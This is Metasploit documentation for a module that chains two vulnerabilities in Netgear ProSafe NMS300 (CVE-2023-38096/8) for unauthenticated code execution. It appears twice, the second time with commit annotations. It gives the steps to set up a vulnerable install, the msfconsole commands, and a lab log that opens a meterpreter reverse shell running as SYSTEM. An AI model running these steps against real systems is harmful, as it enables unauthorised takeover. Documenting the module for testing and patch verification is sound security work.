documentation/modules/exploit/windows/http/netgear_nms_rce.md

## Vulnerable Application

Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has multiple vulnerabilities that can allow an unauthenticated remote
attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,
SQL injection, arbitrary file upload, and privilege escalation across various versions.
This module is able to spawn a meterpreter session by chaining together two specific
vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
This module has been tested with versions `1.5.0.2`, `1.4.0.17`, `1.7.0.12`, and `1.7.0.1`.

Note: Module should also work against version `1.1.0.13` but it wasn't tested.

## Testing
For installing the vulnerable version follow the steps below,
1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below **v1.7.0.22**.
2. Follow installation steps.

After these steps the ProSAFE NMS web panel will be exposed on the `http://localhost:8080/` address.

## Verification Steps

1. msfconsole
2. Do: `use exploit/windows/http/netgear_nms_rce`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]`
5. Do: `exploit`

## Options

## Scenarios

```
msf6 > use exploit/windows/http/netgear_nms_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(windows/http/netgear_nms_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.104:8080 - Uploading payload...
[+] 192.168.56.104:8080 - Payload uploaded successfully
[*] 192.168.56.104:8080 - Executing payload...
[*] Sending stage (175686 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter >

```
Add Netgear NMS RCE (CVE-2023-38096/8) exploit 2023-08-02 18:03:57 +02:00			`## Vulnerable Application`

			`Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.`
			`The application has multiple vulnerabilities that can allow an unauthenticated remote`
			`attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,`
			`SQL injection, arbitrary file upload, and privilege escalation across various versions.`
			`This module is able to spawn a meterpreter session by chaining together two specific`
			`vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.`
Doc update. 2023-08-25 21:18:48 +02:00			This module has been tested with versions `1.5.0.2`, `1.4.0.17`, `1.7.0.12`, and `1.7.0.1`.

			Note: Module should also work against version `1.1.0.13` but it wasn't tested.
Add Netgear NMS RCE (CVE-2023-38096/8) exploit 2023-08-02 18:03:57 +02:00
			`## Testing`
			`For installing the vulnerable version follow the steps below,`
			`1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below v1.7.0.22.`
			`2. Follow installation steps.`

			After these steps the ProSAFE NMS web panel will be exposed on the `http://localhost:8080/` address.

			`## Verification Steps`

			`1. msfconsole`
			2. Do: `use exploit/windows/http/netgear_nms_rce`
			3. Do: `set RHOST [IP]`
			4. Do: `set RPORT [PORT]`
Update documentation/modules/exploit/windows/http/netgear_nms_rce.md 2023-08-24 16:10:30 +00:00			5. Do: `exploit`
Add Netgear NMS RCE (CVE-2023-38096/8) exploit 2023-08-02 18:03:57 +02:00
			`## Options`

			`## Scenarios`

			```
			`msf6 > use exploit/windows/http/netgear_nms_rce`
			`[*] Using configured payload windows/meterpreter/reverse_tcp`
			`msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104`
			`rhosts => 192.168.56.104`
			`msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1`
			`lhost => 192.168.56.1`
			`msf6 exploit(windows/http/netgear_nms_rce) > run`

			`[*] Started reverse TCP handler on 192.168.56.1:4444`
			`[*] 192.168.56.104:8080 - Uploading payload...`
			`[+] 192.168.56.104:8080 - Payload uploaded successfully`
			`[*] 192.168.56.104:8080 - Executing payload...`
			`[*] Sending stage (175686 bytes) to 192.168.56.104`
			`[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter >`

			```